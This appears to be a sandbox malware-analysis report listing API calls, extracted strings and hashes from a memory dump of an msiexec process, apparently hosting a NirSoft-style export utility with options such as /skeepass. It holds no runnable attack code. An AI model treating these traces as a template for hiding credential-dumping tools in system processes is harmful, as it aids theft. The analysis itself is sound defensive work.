                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                                          • String ID: ---
                                                                                                          • API String ID: 3437578500-2854292027
                                                                                                          • Opcode ID: 86eb99c19707b425fb2b039d8f5ba7922df37cc2677e68e6646184786069dd0e
                                                                                                          • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                                          • Opcode Fuzzy Hash: 86eb99c19707b425fb2b039d8f5ba7922df37cc2677e68e6646184786069dd0e
                                                                                                          • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 0041087D
                                                                                                          • memset.MSVCRT ref: 00410892
                                                                                                          • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                          • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                          • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                          • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                          • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                          • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                          • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                          • DeleteObject.GDI32(?), ref: 004109D0
                                                                                                          • DeleteObject.GDI32(?), ref: 004109D6
                                                                                                          • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                          • String ID:
                                                                                                          • API String ID: 1010922700-0
                                                                                                          • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                          • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                                          • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                          • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                                          APIs
                                                                                                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                          • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                          • malloc.MSVCRT ref: 004186B7
                                                                                                          • free.MSVCRT ref: 004186C7
                                                                                                          • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                                          • free.MSVCRT ref: 004186E0
                                                                                                          • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                                          • malloc.MSVCRT ref: 004186FE
                                                                                                          • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                                          • free.MSVCRT ref: 00418716
                                                                                                          • free.MSVCRT ref: 0041872A
                                                                                                          • free.MSVCRT ref: 00418749
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: free$FullNamePath$malloc$Version
                                                                                                          • String ID: |A
                                                                                                          • API String ID: 3356672799-1717621600
                                                                                                          • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                                          • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                                          • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                                          • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcsicmp
                                                                                                          • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                          • API String ID: 2081463915-1959339147
                                                                                                          • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                          • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                                          • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                          • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                                          APIs
                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                          • API String ID: 2012295524-70141382
                                                                                                          • Opcode ID: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                                                                                                          • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                                          • Opcode Fuzzy Hash: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                                                                                                          • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                                          APIs
                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                                          • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                          • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                          • API String ID: 667068680-3953557276
                                                                                                          • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                          • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                                          • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                          • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                                          APIs
                                                                                                          • GetDC.USER32(00000000), ref: 004121FF
                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                          • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                          • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                          • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                          • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                            • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                            • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                            • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                          • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                          • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                          • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                          • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                          • String ID:
                                                                                                          • API String ID: 1700100422-0
                                                                                                          • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                          • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                                          • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                          • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                                          APIs
                                                                                                          • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                          • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                          • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                          • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                          • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                          • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                          • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                          • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                          • String ID:
                                                                                                          • API String ID: 552707033-0
                                                                                                          • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                          • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                                          • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                          • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$_snwprintf
                                                                                                          • String ID: %%0.%df
                                                                                                          • API String ID: 3473751417-763548558
                                                                                                          • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                          • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                                          • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                          • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                                          APIs
                                                                                                          • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                          • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                          • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                          • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                          • GetParent.USER32(?), ref: 00406136
                                                                                                          • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                          • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                          • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                          • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                          • String ID: A
                                                                                                          • API String ID: 2892645895-3554254475
                                                                                                          • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                          • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                                          • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                          • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                                          APIs
                                                                                                          • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                                            • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                                            • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                                            • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                                            • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                                          • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                                          • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                                          • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                                          • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                                          • memset.MSVCRT ref: 0040DA23
                                                                                                          • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                                          • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                                          • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                                            • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                          • String ID: caption
                                                                                                          • API String ID: 973020956-4135340389
                                                                                                          • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                                          • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                                                          • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                                          • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                                          • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                                          • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                                          • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$_snwprintf$wcscpy
                                                                                                          • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                          • API String ID: 1283228442-2366825230
                                                                                                          • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                                          • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                                                          • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                                          • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                                                          APIs
                                                                                                          • wcschr.MSVCRT ref: 00413972
                                                                                                          • wcscpy.MSVCRT ref: 00413982
                                                                                                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                            • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                          • wcscpy.MSVCRT ref: 004139D1
                                                                                                          • wcscat.MSVCRT ref: 004139DC
                                                                                                          • memset.MSVCRT ref: 004139B8
                                                                                                            • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                                            • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                                          • memset.MSVCRT ref: 00413A00
                                                                                                          • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                                                          • wcscat.MSVCRT ref: 00413A27
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                          • String ID: \systemroot
                                                                                                          • API String ID: 4173585201-1821301763
                                                                                                          • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                                          • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                                                          • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                                          • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: wcscpy
                                                                                                          • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                          • API String ID: 1284135714-318151290
                                                                                                          • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                                          • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                                                          • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                                          • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                                                                          APIs
                                                                                                            • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                            • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                            • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                          • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                                          • strchr.MSVCRT ref: 0040C140
                                                                                                          • strchr.MSVCRT ref: 0040C151
                                                                                                          • _strlwr.MSVCRT ref: 0040C15F
                                                                                                          • memset.MSVCRT ref: 0040C17A
                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Filememcpystrchr$CloseHandlePointerSize_memicmp_strlwrmemset
                                                                                                          • String ID: 4$h
                                                                                                          • API String ID: 4019544885-1856150674
                                                                                                          • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                          • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                                          • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                          • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                          • String ID: 0$6
                                                                                                          • API String ID: 4066108131-3849865405
                                                                                                          • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                          • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                                          • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                          • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 004082EF
                                                                                                            • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                          • memset.MSVCRT ref: 00408362
                                                                                                          • memset.MSVCRT ref: 00408377
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$ByteCharMultiWide
                                                                                                          • String ID:
                                                                                                          • API String ID: 290601579-0
                                                                                                          • Opcode ID: c60d666c950e1de6cba0954a24524a9e41ca0abebb320c38a87f7a6f74f5840a
                                                                                                          • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                                          • Opcode Fuzzy Hash: c60d666c950e1de6cba0954a24524a9e41ca0abebb320c38a87f7a6f74f5840a
                                                                                                          • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                                          APIs
                                                                                                          • memchr.MSVCRT ref: 00444EBF
                                                                                                          • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                          • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                          • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                          • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                                                                                          • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                                                                                          • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                                                                                          • memset.MSVCRT ref: 0044505E
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memcpy$memchrmemset
                                                                                                          • String ID: PD$PD
                                                                                                          • API String ID: 1581201632-2312785699
                                                                                                          • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                                          • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                                                          • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
